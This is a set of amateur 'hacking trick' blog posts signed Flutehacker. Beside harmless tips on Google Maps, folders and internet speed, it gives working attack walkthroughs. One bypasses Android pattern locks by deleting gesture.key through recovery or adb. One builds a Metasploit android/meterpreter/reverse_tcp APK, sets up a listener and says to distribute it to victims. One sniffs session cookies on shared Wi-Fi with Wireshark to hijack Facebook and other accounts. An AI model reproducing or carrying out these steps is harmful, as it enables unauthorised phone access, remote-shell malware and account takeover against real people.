How To Unlock Pattern Lock On Android Phone [3 Ways]

Android smartphones are famous world wide for having various kind of useful application, games. Android is attractive OS but not so secure as it should had to be. As we can easily download Paid android for free. Which show that how much android is secure. Normally we use pattern lock to protect phone for others or even we use some applications but all these patterns can easily bypass just by doing little bit efforts. We just reset our phone to remove these pattern lock but what about if we wants to Unlock Android Pattern Lock Without Losing Your Personal Data ?? Don't worry you are at a right place. Like we know android is an open source platform and we can customize its settings & features according to us if we have a deep knowledge about android. It is a very easy and simple  method to secure our personal mobile phone data with pattern lock. We have to just draw a pattern and that's it and you don't have to bother put numbers or characters for password because we can easily forget numbers and characters as compare to pattern lock. It is a very rare case but you may forget your pattern lock. As usual we use gmail account in play store it become easy to reset but if you don't have an email address to reset it. So don't worry, those who forgot or might be forget their android pattern lock can easily unlock pattern lock without losing their personal data. Here we found some methods through which you can unlock pattern lock any of your android smartphone. We are going to explain different methods to unlock android smartphone pattern lock without losing data. So choose which you find out easy to do.
......
.
.

#1 Method:- To Unlock Android Pattern Lock Without Losing Data.

Download Aroma File Manager.
A memory card for android device.
You android device either locked by pattern lock or password lock.

Step 1:- After download Aroma File Manager place it in your memory card (SD card). Insert the memory card into your locked android device.


Step 2:- Open Stock Recovery Mode with reboot your android device and pressing Power Key and Volume up key simultaneously. Different phones may be have different methods to open stock recovery mode so if you face any problem Google it.


Step 3:- After entering into recovery mode use Volume+ and Volume- buttons to scroll up and down. For select use middle button.

Step 4:- From there click on "Install Zip from SD Card" and give path to install "Aroma File Manager" from SD card.

Step 5:- After installing, it will open in recovery mode.

Step 6:- From the Aroma File Manager navigate to settings >> go to bottom and click on "Automount all devices on start" and then exit.


Step 7:- Repeat Step 4 & 5 again.

Step 8:- After this you will get "Aroma File Manager" opened again.

Step 9:- Now navigate to Data Folder >> System Folder  and find >> "gesture.key" or "password.key" for pattern lock or password lock respectively.

Step 10:- Delete that any one file and then exit aroma file manager and reboot your android device. After rebooting you will notice that password or pattern lock not removed. But don't worry draw any pattern and you will open your android device but remember or note that pattern.
.
.
.
.

#2 Method:- To Unlock Android Pattern Lock Without Losing Data

#1. First Requirement is Download Android SDK and here I will show you How To download and install Android SDK Tools.


Download and install Android SDK Tools for run ADB commands. Now select platform according to you download and install it.
After installing open it, unchecked the other packages and check Android SDK Platform-tools and then click on install packages..
.

.

#2. So the other requirement is USB Debugging should be enable before your android device locked.

. The process
will not be helpful if you doesn’t have specific and compatible drivers for your phone. So you should be very careful While installing your device compatible drivers.


Steps To Unlock Android Pattern Lock

Step 1:- Connect your locked android phone with PC/Laptop via USB.

Step 2:- Open folder where you installed Android SDK Tools Users >> App Data >> Local >> Android >> Android-SDK >> Platform-Tools and then click on blank space hold shift and click right mouse button and select "open command window here".

Step 3:- It will open you command window now you have to put some commands in the command window:-

For check your device is connected or not put command:-

adb devices

Now put these commands:-

adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name=’lock_pattern_autolock’;
update system set value=0 where name=’lockscreen.lockedoutpermanently’;
.quit


If above commands not working put:-

adb shell rm /data/system/gesture.key


Step 4:- Once you done you have to reboot your android device. Now its all done.

After rebooting your device you will see the pattern lock disabled. So in this method USB Debugging should be enable before locked and it is must. But If it is not enable then you cannot proceed further steps.

.
.
.
.

#3 Method:- Unlock Pattern With Factory Settings (Data Will Lost)

.
..
In the above methods we used PC/Laptop, we downloaded software and we put some commands. But if you haven't PC/Laptop or your device was not enable USB Debugging then you can follow this method

Note:- In this method your all data will be lost. So if you do not want to lose your data then don't  follow this method.

Step 1:- First Switch off your Locked Android Device.

Step 2:- Now, boot your Android device into “Recovery Mode” using specific keys by holding power key and volume up key simultaneously.

Step 3:- After opening Recovery Mode

Select “Factory Data Reset” option and give “Yes“.
Select “Wipe Cache Partition” to wipe cache data.

Step 4:- After above steps Reboot your device.

Step 5:- All Done ! Now, your device will start from the scratch.


few may use this to hack but we can use this in a right way to open someone phone or even yours in trouble time. If you have any question leave your comments below.
.
.
.
Flutehacker

Hacking Android Smartphone Tutorial using Metasploit.
.

.

Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide.

.
.
.
.

Here is some initial information for this tutorial:

Attacker IP address: 192.168.8.94

Attacker port to receive connection: 443

Requirements:

1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)

2. Android smartphone (we use asus zenfone 6 android )




Step by Step Hacking Android Smartphone Tutorial using Metasploit:
1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
.
.
.

2. We will utilize Metasploit payload framework to create exploit for this tutorial.

msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
.
.
.

As described above that attacker IP address is 192.168.8.94,......
.
.

.

3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.

Info:

use exploit/multi/handler –> we will use Metasploit handler

set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
.
.
.
.


4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.

Info:

set lhost 192.168.8.94 –> attacker IP address

set lport 443 –> port to listen the reverse connection

exploit –> start to listen incoming connection

5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution  ).
.
.
.

6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console ...
.



7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.....
...

.here its is .....you hacked victim phone.....if you got any problem comment below i will try solve it.
.
.
Flutehacker

HOW TO REPAIR A CORRUPTED MEMORY CARD OR A PENDRIVE

Their are many method available on the net for repairing the corrupted memory card but my favorite method is using cmd
It is the best method according to me which has repair my many memory card as well as pendrives
Their are many software available on the net which can repair memory card and pendrive but will b off trial period which will as for the purchase in the future or it will b a fake software ...

But This method which I'm going to tell you does not require any software download
we will just use a cmd to do our process and once our process gets over our corrupted memory card or pendrive will start working correctly....
.
.

carefully check out the process and do the same as said step by step( screenshots is also provided)....
.

Step 1 - Open cmd (not in Admin mode).
.
.

Step 2 - Now type diskpart and press enter.
.
.
.

Step 3 - A new diskpart cmd window will appear we have to work on this window
.
.

.

Step 4 - Now on this window type list disk and press enter. After you press enter it will show all the harddisk an external storage devices connected to the pc
select the external storage device connect ie. the corrupted memory card or pendrive
you will know this device by just seeing the size of the disk
mostly Disk 1 is the external storage device.
.
.

Step 5 - Now type select disk 1 and press enter.
.
.
.

Step 6 - Now type clean and press enter.
.

Step 7 - Now type create partition primary and press enter.
.

.
.

Step 8 - Now type active and press enter.
.
.

Step 9 - Now type select partition 1 and press enter.
.
.

Step 10 - Now type format fs=fat32 and press enter
After pressing enter the formating will start
let the format to get completed.
.
.
.

Step 11 - After the completion of format process type exit and press enter
which will exit the window
.
.
.

That's it your memory card or pendrive will start working properly
check out the working by transferring the files into it...

N as i say Enjoy Repairing.............!!!!!!!
------------------------------------------
.
.
As many of the viewers are facing problems regarding this article.....comment below
I will try to complete your confusion.
.
.
Flutehacker

Cookie Stealing Attack: Hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc.

Using this method you can hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc.

this works At
LAN(local Area Network) . its best place to hack at university, cafe , public place where computer
are on one LAN simple Example WI-Fi.

What is Cookies And how the use of stealing
cookies?

Cookies are file’s that stored on Any computer’s By any website when a you visits them . the
cookie used by the web server to check the
authenticate the Real user . like you Enter Login in Facebook then a unique string’s Generated and the one copy saved in the web server and other is saved on your Browser as a Cookie file .
both are matched when you open a Account.
so then finally we will start.

Step 1:
Download the Wire Shark and install it.

Step 2:
Next open the wire shark and then click on
interface.

Step 3:
Next choose a interface which is received and
sending packet and click on start

Step 4:
Continue the sniffing for around like 10 minutes.

Step 5:
After a maximum 10 minute stop the sniffing by going to a capture menu.

Step6:
its important step, now filter to http. cookie contains “datr”. Then
filter the all search for http cookies with a name of datr and there is Facebook authentication’s cookie.

Step 7:
Now click on it and then goto the copy > Bytes
> Printable Text only

Step 8:
Now for next step you must have 3 thing,
1. Mozilla Firefox [browser]
2. Grease Monkey[add-on]
3. Cookie injector[code]
and then open facebook. com make sure you are
not login

Step 9:
Press the button Alt C to bring up a cookie
injector and then Simply paste in a cookie value
into it.

Step 10
Now refresh your page so then finally you Enter
the Victim Account.
.

Flutehacker

Create A Undeletable And Unrenamable Folders In Windows

In this tutorial you will learn cool and simple trick to Create an undeletable and unrenamable Folders In Windows operating system. Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below.

Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to create folder with above mentioned names, Because they are reserved words in windows.
How To Create Undeletable And Unrenamable Folders ?

Go to Start and then Click on Run
Type cmd & hit enter (To open Command Prompt ).
Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
Type D: or E: and hit enter
Type md con\ and hit enter (md - make directory)

You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.

Open that directory, you will see the folder created of name con.
Try to delete that folder or rename that folder windows will show the error message.

How to delete that folder ?

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.

Open Command Prompt
Type D: ( if u created this type of folder in D: drive) & hit enter
Type rd con\ (rd - remove directory)
Open that directory and the folder will not appear because it is removed.

.
Flutehacker

Google Maps lets you zoom in pretty close for its mapped locations, but there's a secret way you might be able to zoom in even closer. Here's how.

.
.

Start by going to somewhere on Google Maps, say, http://goo.gl/maps/t4sph

Zoom in as far as it will let you by clicking on the "+" sign at the top of the magnification slider at the top left of the map.

When you're in as far as you can go (heh) but not all the way to street view (if the location you're looking at even has street view), look over at the white space just to the top left of the map....where the little printer and chain link buttons are.

Click on the chain "link" button. That will show you a box with a long URL to the map you are looking at and another box with some HTML code to embed. Ignore the HTML code.

Copy the long URL and paste it into your browser's address bar, but don't hit enter to go to that URL yet. Instead, click to edit it and scroll all the way to the right. It should end with something like "&z=22". Change the 22 to 23 ("&z=23") and hit enter. If Google Maps has imagery at that higher zoom level, it will show it to you.

it works, much like other Google URL tweaks. It doesn't work for all locations, however. Your best bet is major cities.you can view some high-res images for them not available to you by default.
.
.
Flutehacker

Best Hacking Tricks To Increase Your Internet Speed | Speed Up Your Net Speed

we all know that a slow internet connection really costs time and makes feel annoying . many friends ask me the ways to increase their internet speed.however . it's possible to do to some extent and make your internet
much better then it was in the past.

There are Two tricks that will help you to increase your internet speed..

First Method- Speed Up Your Net Speed By 20%

1. First you go to start button

2. Go To Run

3. Type gpedit.msc And Then Hit Enter.

4.Then Expand Adminsitrative Templates.

5.Then Network

6.Then QoS Packet Scheduler.

Now A New List Appear . Click On Limit Reservable Bandwidth.
Just Disable it.

Now You Click On Apply .

That's It Now You Are Done !! :)

Now Just Restart Your Computer . And I hope You will Get change in Your Speed

Some Basic Tricks From My Side-

1. Use IDM To Boost Your Downloading Speed.

2. Use A Good Anti-virus in Your Computer.

3. Remove Unwanted Add-ons, Software,Unwanted Files Form Your Computer.

4.Update Your Drivers Periodically.

5.Keep A Good Maintennance Of Your Computer.

Flutehacker